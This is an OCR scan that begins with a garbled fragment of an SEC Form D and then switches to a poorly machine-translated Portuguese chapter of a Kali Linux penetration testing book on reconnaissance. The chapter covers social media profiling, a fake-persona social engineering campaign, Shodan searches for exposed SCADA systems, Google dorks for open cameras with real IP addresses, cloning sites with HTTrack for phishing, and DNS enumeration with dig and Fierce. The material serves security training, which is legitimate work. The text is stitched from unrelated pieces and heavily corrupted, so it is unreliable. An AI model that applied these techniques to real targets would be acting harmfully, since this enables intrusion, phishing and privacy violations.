OQMA APPROVAL omü 
UNITED STATES OMB Number: 3235-0076 
SECURITIES AND EXCHANGE COMMISSION Expires: April J0, 2008 
Washington, D.C. 20549 Estimated average burden hours per 


foem.......... 1600 
FORM D 
NOTICE OF SALE OF SECURITIES 
PURSUANT TO REGULATION D, 
SECTION 4/6), ANIVOR 
08046849 FORM LIMITED 
APR 302008 

Name of Offering {f | check if this xs an amendment and care SON REUTERS | 3x0 
Issunnce of Warrants for shares of Common Peso, 
Filing Under (Check bondes) thal apply): | JRule S [ (Rude S05 [X]Rule 505 [ Seaia a | ALOE Seaver 
Type of Filing: [s Jew Fileg | JAmmdnem 

ABASIC IDENTIFICATION DATA pro Allis 
| Enter the mécermamon saout tho issuer 


“Name of [erar (| ] check if this is a amandman asd name has changed, and deske change) ação” 


La Inc. 
Adress of Executive Offices {amber and Sheet, City, State, Zap Cadei Telephone Number (iackattag Asa Cade) 
3650 Brookside Parkway, Brookside Concourse 100, Suite 400, 776-225-6500 
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Recursos de mídia social 


A mídia social está em toda parte, e na maioria dos casos, acessível ao público. A maioria das 
pessoas tem 

um Facebook, Linkedln, blogs, ou outras formas de contas nuvem contendo valioso 
informações. Esta informação pode ser usada como um meio de inteligência engenharia social 
de pessoal atual ou anterior de um alvo. Um exemplo é a pesquisa Glassdoor.com para 
identificar os funcionários anteriores que estão descontentes, com base no feedback. 


Há muitas pessoas que encontram os recursos da web como Maltego (encontrado em Kali Linux) 
que pode pentear meios populares sociais, registros públicos, e sites de recrutamento de trabalho 
para 

impressão digital de um indivíduo com base em informação limitada, como um primeiro e último 
nome. 

Um pesquisador pode coletar informações como em todos os lugares um indivíduo vive, 

feito negócios, pessoas com as quais eles se socializar, interesses especiais, esporte favorito 
equipes, e outros dados úteis para futuros ataques de pesquisa e engenharia social. 


Confiança 


A maioria das pessoas são naturalmente confiante e assumir informações publicadas em fontes 
públicas é 

real. Para testar este conceito, os autores deste livro criou uma falsa pessoa através sociais 

mídia e fingiu ser uma nova contratação para uma empresa-alvo. A pessoa seria falso 

se tornar amigos com os associados de nossa meta, cartão postal de férias falsos que estão ligados 
para uma Carne sistema projetado para comprometer navegadores de Internet mais vulneráveis (com 
carne bovina 

é coberto mais tarde neste livro), e informações confidenciais capturado a partir comprometida 
sistemas. Nós fomos capazes de mapear toda a organização, obter informações sobre a rede, 

e ainda teve hardware embarcado para nós sem o número de e-mail ou telefone interno. 

Nossa pessoa falsa, Emily Williams não é real, ofertas de emprego ainda recebeu, foi fornecido dentro 
informação e acesso a eventos organizados pelo alvo. Informação é poder, e 

as pessoas vão dar a um solicitador que parece que eles podem ser confiáveis. 


Mais informações sobre este projeto podem ser encontradas 
Fiftd:/www.thesecurityblogger.com/?p=1903 


Postagens de 


mprego contêm uma riqueza de conhecimentos sobre o ambiente de um alvo. 
Anúncios dé emprego 
pode fornecer mais detalhes sobre que tipo de sistemas são instalados, que os administra, como 
grande o pessoal é, e nível de habilidade dos funcionários. Representantes de Recursos Humanos 
são 
tipicamente ansioso para compartilhar informações com um novo potencial de aluguer, o que pode ser 
usado como 
uma avenida a informação privilegiada. Um exemplo é alvo de um anúncio de emprego para um 
Oráculo 
desenvolvedor para entender o hardware, versão do Oracle, os nomes dos existentes e 
administradores anteriores, as questões existentes de operação, falhas de segurança e métodos para 


acesso, como perguntar "pode administradores trabalhar em casa, e como eles acessam 
1 " [41] 
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Outra via de avaliar é o salário de um trabalho esperado, benefícios e taxa de rotatividade no 
placas do trabalho populares. Estas tendências podem descobrir novos vetores de ataque. 
Glassdoor. 

com é um exemplo de uma fonte popular para este tipo de dados. 


Localização 


O investimento em segurança cibernética para um alvo geralmente pode ser determinado com base 
em 

o nível de segurança física. Seria de supor um edifício com cercas e armado 

guardas teria um investimento maior em segurança cibernética do que um alvo localizado dentro 
um edifício público. Fontes de mapeamento on-line, como o Google Maps pode ajudar a identificar 
onde a segurança física é implementada, e as tendências sobre a forma como as pessoas se 
deslocam de e para 

a partir do alvo. Outras áreas de interesse são a identificação de onde um verificador da penetração 
poderia acampar para procurar redes sem fio, e os possíveis métodos para derivação 

controles de acesso, tais como trajes e emblemas usados para obter acesso físico. 


Shodan 


Shodan é um motor de busca que pode identificar um dispositivo específico, como o 
computador, 

router, um servidor, usando uma variedade de filtros, tais como os metadados de faixas do 
sistema. 

Por exemplo, você pode procurar por um sistema específico, como um Cisco 3850, correndo 
uma versão do software, tais como IOS versão 15.0 (1) EX. 
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O exemplo a seguir é um caso de uso em busca de qualquer sistema SCADA com público 

Acesso à Internet, o que, em teoria, não deveria existir no entanto, pode mostrar Shodan 

isto não é necessariamente verdade. Coisas de controle sistemas SCADA, como gerenciamento de 
energia 

e tratamento de água, de modo que a identificação de sistemas acessíveis públicas é extremamente 
ruim! 


“4% SHODAN 


78.70 11.144 HTTPL 401 Unouthorized 
Tellia Sonera AB 

Date: Thu. 28 Poh 2011 17:57:16 GMT 
ES Stânga Server: Boa/0.92.15 


Cornocton: close 
7TE-TO-1 1-1 44-n01 48,Dus incss.telia com 
HTTP Alternate WWW. Acthen toate: Basie realm=*pebsCADA* 


Comment Ty pe: iexrhimi 


Top Countries 


United States 
Canada 
Finland 


65.96.173.75 
Conaway Preservation Group, LLC 


ME Pam Decet 


NetBIOS Response 


Servernume: SCADA 


Sweden 13 MAC: bao GRI 7bicd 
Denmark cust-65-$8-173-T5 static of com 


Names 
SCADA <)a0> 
Top Cities WORKGROUP «x 0> 
Calgary SCADA <x20 
Houston WORKGROUP fx tes 
Syivan Lake WORKOROL P <x Id> 
Burnaby , MSBROWSE | <Oxl> 
Stockholm 


401 Authorization Required 
142.59.128.96 

Windows XP 

AGT 


Top Organizations 


Telus Communications 
Nucleus Information Se... f isi cagar 
Telefonica de Espana 

Comcast Business Commu. 

Hetzner Online AG 


810-937 -797-225. ebheln telus. net 
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Google hackers 


Google hacking é a forma mais comum de motor de busca de reconhecimento de web 

aplicações. Google Hacking usa operações avançadas no motor de busca Google 

para localizar sequências específicas de texto dentro de resultados de pesquisa. Filtros de pesquisa 
pode se concentrar em 

versões específicas de aplicações web vulneráveis, tais como Desenvolvido por Apache no 

intitle: "index of" operador ou identificar arquivos de log como ws ftp.log, Contendo 

informações de IP sensível. A seguir alguns screenshots demonstrar usando um Google 

procurar Linksys para encontrar câmeras Linksys publicamente disponíveis. A primeira imagem 
mostra o comando de pesquisa seguido de alguns exemplos de resultados de emissão da pesquisa. 
A última imagem mostra um avanço de câmera que poderia ser encontrado usando esta técnica. 


Google inurt:main.cgi linksys 


Web mages Maps Shopping More - Segron tools 


Linksys Wireless-G Intemet Video Camera 
92.71.245.81:1027/main.cgi?next_file=index.him + 


Linksys. Vor 2.12, Home | View Video | Setup | Linksys WEEB | Help | Exit. 


Linksys Wireless-G PTZ Internet Camera with Audio 
mam-camere.dnsalias.neUmain.cgi?next_file=index.htm * 

WYVC200. Wireless-G PTZ Internet Camera with Audio, Home! View Video! Setup! 
Linksys Wabi Exit. Connected User Number: 0. © Copyright 2007 Cisco... 


Linksys Web Camera 
177.442 48.3-4028/main.cgi?next Flesindexhim + 


Linksys. Vor 2.13. Home | View Video | Satup | Linksys WEE | Help | Exit. 


Linksys Internet Camera 
91, 196.11.12/main.egi?next_file=v_video.him ~ 


LINKSYS PVC2300. 


Linksys Wireless-G Intemet Video Camera 
72 250. 149 128:1024/main.cgi ?next_file=index htm + 


Linksys. Vor 2.11, Horno | View Video | Satup | Linksys WEB | Help | Exit. 
You've visited this page 4 times Last visit: 349/43 


Linksys Wireless-G PTZ Internet Camera with Audio 

213.67.110, 104:1024/main.ogi ?next_filesmain. htm ~ 

WVC200. Linksys Wireless-G PTZ Intemet Camera with Audio. Home, |, View Video, 
, Setup, |, Linksys Web, |, Exit Image Resolution. 640x480, 320x240, 160x __ 


Linksys Wireless-G PTZ Internet Camera with Audio 

66. 11.106.28:8181/main.egi?next_filo=main.ntm ~ 

WVC200. Wireless-G PTZ Internet Camera with Audio, Home! View Video! Setup| 
Linksys Web| Exit. Image Resolution, 640°480, 320°240, 150°128. Nortrwes ... 
You've visited this page 3 times. Last visit 3/19/13 
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Wiroloss-N Intornot Horne Monitoring Carnora 


iroa. org 36626530220 


© Copyngrt 2008 Cano Sysmma inc AN! rights reserved 


Algumas consultas exemplo da pesquisa sao os 
seguintes: 
e Identifica documentos sensíveis: intext: classificadas secreto 


e Identifica Linksys GUIs de gerenciamento de câmera (cuidado: você pode não gostar 
o que você encontrar): inurl: main.cgi 


e Identifica Nessus relatórios para encontrar sistemas vulneráveis: inurl: NESSUSXXXXXXXX 


Para mais informações sobre Google hacking, confira um bom livro intitulado Google 
Hacking para testadores de penetração por Johnny Long, bem como o seu website em http:// 
johnny .ihackstuff.com. 


Google Hacking Banco de Dados 


O Google Hacking Banco de Dados (GHDB) criado por Johnny Long de Hackers Para 
Caridade (http://www .hackersforcharity.org/), E a fonte definitiva para o Google 

consultas de pesquisa. Procura por nomes de usuário, senhas, sistemas vulneráveis e exploits 
foram capturados e categorizados por aficionados de hackers do Google. Os aficionados 

que categorizou as buscas do Google são afetuosamente conhecido como idiotas do Google. 
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Para acessar o GHDB, navegue até http://www .exploit-do.com/google-dorks/. 
Você vai ver as últimas pesquisas GHDB listados na página web. Você pode clicar em qualquer 


da pesquisa questiona a si mesmo. 


CO! Pr oO} i 
HACKING-DATAZASE 


Welcome to the googie hacking database 


We call them 'googledorks: Inept or foolish people as revealed by Google. Whatever you call these 
fools, you've found the center of the Google Hacking Universe! 


Search Google Dorks 
Category: Free text search: ES 


Latest Google Hacking Entries 
Date Title 


Vocé vai encontrar diferentes categorias de pesquisas na parte inferior da pagina que tem 
foi salvo. No exemplo a seguir, desloque-se para a categoria Arquivos Vulneravel 
e selecione a consulta Assistente Carregador ionCube. 


COON E 


HACKING-DATAZASE 
Welcome to the google hacking database 


We call them ‘googledorks’: Inept or foolish people as revealed by Google. Whatever you call these 
fools, you've found the center of the Google Hacking Universe! 


Search Googte Dorks 
Category: RIT Free text search: i TT 
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"wa 


Google search: 


Hits: 5280 
Submited: 2011-05-28 


Podemos selecionar a consulta de pesquisa, e vai trazer-nos para o Google, a realização do 
mesma consulta de pesquisa. 


Google inurl:loader-wizard ext:php 


Web 


ion cWi l 
gsship.org/GSSC/ICONCubdeinstall/.. Joader-wizard phpºtimeout.. + 
Loader is at: /nome4/gsshipor/public_htmi/ioncuba/ioncube_loader lin 52.50. Loader 
OS code: lin. Loader architecture x86, Loader word size; 32. Loader PHP ... 


i rWizar 
tecnologias101.info/algesweb/ioncube/loader-wizard_php + 

Please contact the script provider if you do experience any problems running encoded 
files, For security reasons we advise that you remove this Wizard script ... 


i t Wizard - Nex st Thing T m 

www, nextbestihinglomorn nevloader-wizard php + 

ionCube Loader Wizard. GoDaddy installation Instructions. It appears that you are 
hosted with GoDaddy (www.godadey.com). If that is not the case then please ... 


ion r f 

www.municanete.god. peloader-wizard php ~ 

onCube Loader Wizard. To use files that have been protected by the lontube PHP 
Encoder, a component called the ionCube Loader must be installed 


ionCube Loader Wizard 

planetgore.com/ioncube/loader-wizard php? pagesdefault + 

onCube Loader Wizard, An updated version of this Wizard scnpt is available here. The 
jonCube Loader version 4.0.4 is already installed and encoded files ... 
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O exemplo anterior mostra Google encontrou alguns resultados. O ionCube Carregadeira 

é, aparentemente, não configurado ou mal configurado. O ionCube Carregadeira é, na verdade, um 
grande pedaço de software que protege o software escrito em PHP de serem visualizados ou 
mudou de computadores não autorizados. No entanto, neste caso, os administradores da esquerda 
assistente padrão rodando sem nenhuma configuração. 


Professional PHP Solutions 


ionCube' 


ionCube Loader Wizard 


To use files that rave been protected by the ionCube PHP Encoder, a component called the ionCube Loader must be installed. 
This Wizard will give you information on how to install the ionCube Loader. 
Please select the type of web server that you have and then click Next, 


Shared (for example, server with FTP access only and no access to php.ini) 
Dedicated or VPS (server with ful root ssh access) 
Local install 


Next 


Quando clicamos no primeiro link, temos a tela inicial para configurar o software. 


O GHDB essencialmente transforma o Google em um scanner de aplicações web limitado para 
um 

Verificador da penetração. Neste caso, um bom software que pode aumentar a segurança pode 
agora 

potencialmente ser usado contra um servidor web por um invasor. 


Pesquisando redes 


Muitas pessoas não entendem o verdadeiro propósito de pesquisar a rede de um 

alvo antes de lançar um ataque. Amadores Penetração Testers compreender a necessidade 

para escolher um alvo antes que eles possam realizar um teste de penetração. Depois de tudo, um 
Penetração 

Tester precisa de um lugar em que para apontar o seu arsenal de ferramentas. Muitos amadores 
vontade 

executar o Nmap, varreduras de ping, ou outras ferramentas ruidosas para determinar o que estão 
disponíveis alvos , . , 

PRR OMERE É RV RASARE RAUNA MASS peresa da rede experiente 
profissional irá dizer-lhe boa Reconnaissance é sobre a seleção de uma meta de qualidade, 
passar a maior parte do seu tempo a ver, em vez de agir. O primeiro passo de 

cada teste de penetração é precisamente encontrar e selecionar as metas de qualidade. 
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Do ponto de vista do cliente, Penetração Testers vai encontrar indivíduos 
que a satisfação do ganho em parar testadores de penetração de provar o seu valor 
como empregados, bem como a forma como ela está bem preparada para ataques 
si cibernéticos. Ele 
E altamente recomendável que um verificador da penetração profissional não 
entrar em conflito com o pessoal do cliente, enquanto os serviços de penetração estão sêndo 
realizada. Um verificador da penetração deve se concentrar em consciência da seguranga, 
e revelar o que vulnerabilidades existem com o mínimo de interação 
com o pessoal do alvo durante um compromisso de serviço. 


A seguir, são as melhores ferramentas disponíveis no Kali para aplicação web 
Reconhecimento. Outras ferramentas podem estar disponíveis para aplicações web 
ou 

diferentes tipos de destino no entanto, o foco deste capítulo é permitir que um 

leitor para avaliar alvos baseados em aplicativos web. 


HT Track - clonar um site 


HT Track é uma ferramenta construída em Kali. O objetivo do HT Track é copiar um site. 

Ela permite que um verificador da penetração de olhar para todo o conteúdo de um site, todas as 
suas páginas, 

e os arquivos off-line, e em seu próprio ambiente controlado. Além disso, vamos usar 

HT Track para ataques de engenharia social em capítulos posteriores. Ter uma cópia de um site 
pode ser usado para desenvolver sites phishing falsos, os quais podem ser incorporados em outros 
Conjuntos de ferramentas de teste de penetração. 


Para usar o HT Track, abra um Terminal janela e digite apt-get install httrack 
como mostrado na figura a seguir. 


a = 


Bo ` D es 
Ni Algumas versões de Kali não tem este built-in. 


:~# apt-get install httrack 
Reading package lists... Done 
Building dependency tree 
Reading state information... Done 
httrack is already the newest version. 
The following packages were automatically installed and are no lonc 


er required; 
greenbone-security-assistant libksba8 libmicrohttpdlo 
Libopenvas6 openvas-administrator openvas-cli openvas-manager 
openvas-scanner xsltproc 

Use ‘apt-get autoremove' to remove them. 

O upgraded, O newly installed, O to remove and 2 not upgraded, 
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Você vai querer criar um diretório para armazenar seu site copiado. A sequência 
imagem mostra um diretório criado nomeado mywebsites usando o mkdir comando. 


Para iniciar HT Track, tipo httrack na janela de comando e dar ao projeto 
um nome, como mostrado na imagem seguinte: 


mkdir mywebsites 
cd / websites 
httrack 


[Track Website Copier (Offline Browser) 3,46+Libhtsj< 


(C) Xavier Roche and other contributors 
the option list, enter a blank line or try httrack --help 


enter project name :§ 


O próximo passo é selecionar um diretório para salvar o site. O exemplo na 
imagem seguinte mostra a pasta criada no passo anterior / Root / 
mywebsites, Usado para o diretório: 


:/# httrack 


velcome to HTTrack Website Copier (Offline Browser) 3. 


.$0.2 
copyright (C) Xavier Roche and other contributors 
To see the option list, enter a blank line or try httr 


nter project name :drchaos.com 


jase path (return=/root/websites/) :/root/mywebsitesfj 


Digite a URL do site que vocé deseja capturar. O exemplo a seguir 

imagem mostra www.drchaos.com. Isso pode ser qualquer site. A maioria dos ataques 
usar um site acessado por clientes de seu alvo, como social popular 

sites de midia ou sites internos do alvo. 


As próximas duas opções são apresentadas sobre o que você quer fazer com o 
local capturado. Opção 2 é o método mais fácil, que é um sítio de espelho com 
um assistente, como mostrado na imagem seguinte: 
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(return=/root /websites/) 


by conmas 


(Multiple Mirror) 
rk Test) 


Em seguida, você pode especificar se você quiser usar um proxy para iniciar o ataque. Você 
também pode 

especificar o tipo de arquivos que você deseja fazer o download (o exemplo a seguir 
imagem mostra *para todos os arquivos). Você também pode definir as opções de linha de 
comando 

ou bandeiras você pode querer definir. O exemplo na imagem seguinte mostra nenhum 


ões adicionais. 
RP fé es httrack é executado, ele irá mostrar o comando que está sendo executado. Você pode usar este 


comando no futuro, se você deseja executar httrack sem passar pelo assistente 
novamente. As duas imagens seguintes mostram hhtrack clonagem www.drchaos.com: 


ultiple Mirror 


Jif www,” 


as recurse Level 


t www. drchaos.com/tag/compLiance/www. facebook .com/aamirl 
90/860: www. drchaos.com/tag/continuous-monitoring/ (3421 
www. drchaos. com/wp- content /uploads/2013/06/1identaity an 
www. drchaos.com/tag/continuous-monitcring/<a href= (33 
www. drchaos . com/benefits-of-using-identity-and-access 
www, drchaos. com/tag/continuous -monitoring/www. facebook 
www. drchaos. com/tag/fedtech/www. facebook .com/aamirlakh 
www. drchaos. com/tag/ise/www. facebook .com/aamirlakhanid 
www. drchaos. com/tag/infosec/www. facebook. com/aamar lakh 
www. drchaos. com/author /tim-adans /www . facebook. com/aami 
l.gravater.com/avatar/fbbf2cf5Sed16f7707a9e5d8dblc657b 
pS3A%2F%2F 1. gravatar. coms2Favatars2Fac516503allcd5ca435 
www. drchaos. com/wp-content/uploads/2013/06/1r plan-130 
* www. drchaos. com/category/travel/www. facebook. com/aamir 
www. drchaos. com/wp-content/uploads/2013/07/Travel-90x6 
www. drchaos, com/wp-content/uploads/2013/07/dsc 0067-309 
www. drchaos.com/tag/travel/www, facebook. com/aamirlakha 
www, drchaos, com/tag/data breach/www. facebook. com/aamir 
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Depois de terminar a clonagem do site, navegue até o diretório onde você 

salvou. Lá dentro, você vai encontrar todos os seus arquivos e páginas da web, como 
mostra a 

tela a seguir: 


Agora você está pronto para pesquisar o site do seu alvo e, eventualmente, construir 
uma 

ferramenta de penetração personalizado ou explorar o acesso do usuário a um site 
clonado. 


Técnicas de reconhecimento de ICMP 


O sibilo e traceroute comandos são boas maneiras de descobrir informações básicas 

sobre o seu destino. Quando a informação viaja através de redes, ele não costuma ir 

diretamente da origem para o destino. Geralmente atravessa vários sistemas, tais 

como roteadores, firewalls e outros sistemas de computador antes que ele chegue ao seu destino. 

O traceroute comando identifica cada sistema os dados viajam através de, juntamente com 

o tempo que leva para que os dados para se deslocar entre os sistemas. A ferramenta é instalada em 
cada 

sistema operacional moderno. Para a maioria dos alvos de alto valor, O sibilo e traceroute 

comandos provavelmente será desativada, e uso excessivo destes serviços 

a maioria dos alertas de disparo prováveis sobre os sistemas de segurança de rede. Muitos firewalls 
ou outros 

criação de sistemas que não responder às rotas número B24RYE. Se os sistemas não respondem 
para traceroute, Usando isso também excessivamente pode desencadear eventos de segurança. Estas 
ferramentas são 

barulhento, e quando usados indiscriminadamente, eles vão disparar alarmes e logs. Se o seu objetivo 
está a ser furtivo, você tem apenas sido derrotada, dando o seu alvo a oportunidade de 

configurar e implementar contramedidas contra o seu teste de penetração. 

Uma varredura ICMP envia simplesmente fora uma solicitação de eco e procura por uma resposta. Se 
a resposta 

é retornado, então, como um verificador da penetração, você sabe que há um possível alvo. O 
problema com varreduras ICMP ICMP é que normalmente é bloqueado pela maioria dos firewalls. 
Que 

significa qualquer scans de fora indo para uma rede de destino interno será bloqueada pelo 


m scanner de IC 
O sibilo comando ia forma mais básica para iniciar uma varredura ICMP. Basta digitar 


em sibilo seguido por um nome de host ou endereço IP para ver o que vai responder ao ICMP 
echo pedido. A figura a seguir mostra um ping www.google.com: 
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Last login: Tue Sep 10 10:28:12 on console 
rtp-jomuniz-8815:» jomuniz$ ping www. G009e. com 
«googe. com (72,44,93,94): 56 data bytes 
from 72.44.93.94; icmp seq=? ttl=45 time=123,566 
from 72.44.93.94; icmp_seq=1 ttl=45 time=118,351 
from 72.44.93.94: icmp seg=2 ttl=45 time=106.218 


from 72.44.93.94: icmp_seqe3 ttl«45 tine#116.490 
from 72.44.93.94: icmp seg=4 tt1l=45 time=116.566 


-— Www.googe.com ping statistics -— 

5 packets transmitted, 5 packets received, 0.0% packet loss 
round-trip min/avg/max/stddey = 106,218/114,638/123.566/5,935 ms 
rtp-jomuniz-8815:~ jomunizs E 


Se você receber qualquer resposta de volta, você vai saber que o seu anfitrião esta vivo. Se você 
receber qualquer 

tempos de espera, o seu pedido ICMP está sendo bloqueado, ou nenhum host de destino recebeu 
seu pedido. 


O problema com o sibilo comando é que ele só permite a utilização de ICMP para 

verificar em um host de cada vez. O fping comando permitirá que você pingue múltipla 

hosts com um único comando. Ele também irá permitir que você leia um arquivo com múltiplas 
nomes de host ou endereços IP e enviá-los usando requisições ICMP pacotes. 


Para usar O fping comando para executar uma varredura ICMP em uma rede, emitir o 
seguinte comando: 


pedaços de rede / host Fping-asg 
fping-asg 10.0.1.0/24 


Embora o umabandeira irá retornar os resultados através do endereço IP de hosts ao vivo só, o 
sbandeira 

exibe estatísticas sobre a digitalização, o gconjuntos de bandeira fping no modo bastante, o que 
significa que 

faz mostrar ao usuário o status de cada varredura, apenas o resumo, quando se completou. 


[ GS O Nmap fornece resultados semelhantes, como o fping comando. 


Técnicas de reconhecimento DNS 


A maioria dos alvos de alto valor tem um nome DNS associado a uma aplicação. DNS 

nomes de torná-lo mais fácil para que os usuários acessem um determinado serviço e adicionar 
uma camada de 

profissionalismo ao seu sistema. Por exemplo, se você quiser acessar o Google para 
informações, você poderia abrir um navegador e digitar 74.125.227.101 ou tipo www. 

google.com. 
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Informações de DNS sobre um alvo em particular pode ser extremamente útil para uma penetração 
Tester. DNS permite que um verificador da penetração para mapear sistemas e subdomínios. Mais 
velho 

Ataques DNS transferir um arquivo de zona de um DNS autoritário, permitindo que o testador 
examinar o conteúdo completo do arquivo de zona para identificar alvos potenciais. Infelizmente, 
maioria dos servidores DNS atuais não permitem transferências de zona não autenticado. No 
entanto, todos 

não está perdido! DNS por sua própria natureza é um serviço que responde a consultas e, portanto, 
um invasor pode usar uma consulta de lista de palavras que contém centenas de nomes com DNS 
servidor. Este vetor de ataque é uma tarefa extremamente demorada, no entanto, a maioria 
aspectos pode ser automatizado. 


Escavação (Domínio informações groper) é um DNS mais popular e amplamente utilizado 
Ferramentas de reconhecimento. Ele consulta os servidores DNS. Para usar Dig, abrir um prompt de 
comando 

e tipo cavar e hostname, em que hostname representa o domínio de destino. Escavação 

irá utilizar os seus sistemas operacionais configurações de DNS padrão para consultar o nome do 
host. 

Você também pode configurar Dig para consultar servidores DNS personalizado, adicionando O <IP> 
ao 

comando. O exemplo na imagem a seguir ilustra usando Dig em 


-GOURLETUICS.CO “> alakhani — bash — 80x24 


chaos:~ alakhani$ 
chaos:~ alakhani$ 
chaos:~ alakhani$ 
chaos:~ alakhani$ dig www.cLloudcentrics.com 


| <<>> DiG 9.8.3-P1 <<>> www.cloudcentrics.com 
; global options: +cmd 
+; Got answer: 
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 57827 
; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: O, ADDITIONAL: O 


>; QUESTION SECTION: 
‘www. Cloudcentrics.com. IN 


+; ANSWER SECTION: 
www, Cloudcentrics.com. 14408 IN CNAME cloudcentrics.com, 
cloudcentrics.com. 14408 IN A 50.116.97.205 


+; Query time: 24 msec 

+; SERVER: 10.0.1.1453(10.0.1.1) 
+; WHEN: Tue Mar 19 23:54:02 2013 
+; MSG SIZE rcvd: 69 


chaos:~ alakhanis À 
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O -T opção Dig vai delegar uma zona DNS para usar o nome de autoridade 
servidores. Nós digite dig-t ns cloudcentrics.com no exemplo da 
tela a seguir: 


alakhani — bash — 80x24 


Last login: Tue Mar 19 23:50:26 on ttys000 
chaos:~ alakhani$ dig -t ns cloudcentrics.com 


; <<>> DiG 9,8,3-Pl <<>> -t ns cloudcentrics.com 
; global options: +cmd 
; Got answer; 
->>HEADER<<- opcode: QUERY, status: NOERROR, id: 15672 
flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: @, ADDITIONAL: @ 


; QUESTION SECTION: 
;cloudcentrics.com. IN NS 


;; ANSWER SECTION: 
cloudcentrics.com. 85749 IN ns3681.hostgator.com. 
cloudcentrics.com. 85749 IN ns3682.hostgator.com, 


;; Query time: 5 msec 

;; SERVER: 10,0.1.1#53(10.8,1.1) 
55 WHEN; Wed Mar 20 00:04:53 2013 
++ MSG SIZE rcvd: 87 


chaos:~ alakhani$ | 


Vemos a partir dos resultados que temos dois servidores DNS autorizados para o domínio 
www.cloudcentrics.com, Pois eles são ns3681 .hostgator.com e ns3682. 
hostgator.com. 


Parabéns, você acaba de encontrar o servidor DNS autorizado para o seu 
alvo de DNS. 


Identificação do alvo DNS 


Agora que você já encontrou os servidores DNS autoritativos para um domínio, você pode 
quero ver o que anfitriões têm entradas sobre esse domínio. Por exemplo, o domínio 
drchaos.com pode ter varios hosts. tal como cloud.drchaos.com, correio. drchaos. 
com,sharepoint.drchaos.com. Todos estes podem ser potenciais aplicações e 

alvos potencialmente alto valor. 


Antes de começar a escolher aleatoriamente anfitriões, devemos consultar o servidor DNS para ver 
que existem entradas. A melhor maneira de fazer isso é perguntar o servidor DNS para nos dizer. Se 
o 

Servidor DNS está configurado para permitir transferências de zona, que vai nos dar uma cópia de 
todas as suas entradas. 
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Kali navios com uma ferramenta chamada Fierce. Fierce irá verificar para ver se o servidor DNS 
permite 

transferências de zona. Se são permitidas transferências de zona, Fierce irá executar uma 
transferência de zona e 

informar o usuário sobre as entradas. Se o servidor DNS não permite transferências de zona, Fierce 
pode ser configurado para nomes de host de força bruta em um servidor DNS. Fierce é concebido 
como 


uma ferramenta de reconhecimento antes de usar uma ferramenta que requer que você sabe os 
Badereeasiierce, navegue até Coleta de Informações |Análise DNS |Fierce. 


Eiareesaradarregado em uma janela de terminal, como mostrado na imagem seguinte. 


threads Specity how many threads to use while scanning {d 

is single threaded). 

-traverse Specify a number of IPs above and below wha 
have found to look for nearby IPs. Default is 5 ab 
below. Traverse will not move into other C blocks. 

version Output, the version number, 

-wide Scan the entire class € after finding any m 


hostnames in that class C. This generates a lot mo 
but can uncover a lot more information. 
-wordlist Use a seperate wordlist (one word per line) 


perl fierce.pl -dns examplecompany.com -wordlist dictionary 
rootakali:~# E 


Para executar o Feroz script, digite o seguinte comando: 
fierce.pl-dns thesecurityblogger.com 


rootilkali:s ierce -dns thesecurityblogger.com 
DNS nesecuritybloggsr.com: 


transfer not 


transfer not 
ns2.d 
Request timed out or transfer not 
one transfer Ait, was worth a shot) 
good old fashioned way... bnute Tar 
or theedefauht wordlist 


Exiting... 
rootm@katié- 
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O domínio thesecurityblogger.com, Mostrado na imagem anterior, tem 

alguns servidores associados. Nós realizamos nossa tarefa. No entanto, você pode 

ver Fierce fracassada de completar uma transferência de zona. Fierce vai tentar a força bruta de uma 
zona 

transferir usando uma lista de palavras ou arquivo de dicionário, se tiver um definido. Nós não o fez, 
porque o objetivo desta seção é determinar o que existe anfitriões no domínio, não 
necessariamente neste momento realizar um ataque de transferência de zona. No entanto, se o seu 
objetivo é 

mais abrangente do que a segmentação de aplicações web, você pode querer explorar mais este 
em seu próprio país. 

Agora podemos atingir um determinado host e usar ferramentas como o Nmap para prosseguir em 
mapeando o nosso alvo. Um aspecto importante do uso Fierce está selecionando um alvo 

usando muito pouco tráfego de rede, o que é importante para evitar a detecção. Iremos 

usar o Nmap para reunir mais informações sobre o nosso alvo mais adiante neste capítulo. 


Gráficos de coleta de informações - Maltego 


Maltego é uma ferramenta de reconhecimento incorporada Kali desenvolvido por Paterva. É um 
ferramenta Reconnaissance multiuso que pode reunir informações usando aberto e 

informação pública na Internet. Tem alguns embutido Reconnaissance DNS, mas 

é muito mais profundo em fingerprinting seu alvo e recolha de informações sobre 

los. Leva as informações e exibe os resultados em um gráfico para análise. 


Para iniciar Maltego, navegue até Aplicação Menu em Kali, e clique no Barrilha menu. 
Em seguida, selecione Coleta de Informações |Análise DNS |Maltego. 


O primeiro passo ao iniciar Maltego é registrá-lo. Você não pode usar o 
aplicação sem registro. 


x Welcome to Maltego! 


Startup wizard - Login (? of 5) 


Enter your details below te log in to the Maltege Community Server 
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Quando você completar o registro, você vai ser capaz de instalar e começar a usar Maltego 
da aplicação. 


x Welcome to Maltego! 


Steps Startup wizard - Update transforms (5 of 5) 


1 Welcome 
2 ogin Ready...Set,,. GO! 


3 Login resul 


. Select trafic seeds Your new Maltego client has been initialized sucessfully 
5. Update Arankstorms 


3 mew application server(s! were found 
141 new transforms were found 


'6 new entities were installed 


You are now ready t je Maltego! 
o Run a machine (NEW! 
Open a blank graph and let me p 
Open an esample graph 


o away, | have done this betore! 


Maltego tem vários métodos de coleta de informações. A melhor maneira de usar 

Maltego é aproveitar o assistente de inicialização para selecionar o tipo de informação 

que pretende reunir. Os usuários experientes pode querer começar com um gráfico em branco ou 
pular 

o assistente todos juntos. O poder de Maltego é que ele permite que você observar visualmente o 
relação entre um domínio, organização e pessoas. Você pode se concentrar em torno de um 
organização específica, ou olhar para uma organização e suas parcerias relacionados de 
Consultas DNS. 


Dependendo das opções de digitalização escolhido, Maltego permitirá que você execute 
o 
seguintes tarefas: 


e Associar um endereço de e-mail para uma pessoa 
* Sites associados a uma pessoa 
e | Verifique o endereço de e-mail 


e  Reúna detalhes do Twitter, incluindo geolocalização de fotos 
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A maioria dos recursos são auto-explicativos e incluem como eles são usados sob a 


descrição característica. Maltego é comumente utilizado para coletar informações e, por vezes, 
usado como o primeiro passo, durante um ataque de engenharia social. 


* Start a Machine 


Steps Run Machine - Choose machine (1 of 2) 


Choose machine 
Specify target 


Please select the machine to run from the list below 


Company Stalker 


Person - Email Address 


¥ Show on startup 


” Show on empty graph click 


Nmap 


Nmap significa Network Mapper, e é usado para fazer a varredura de hosts e serviços na 
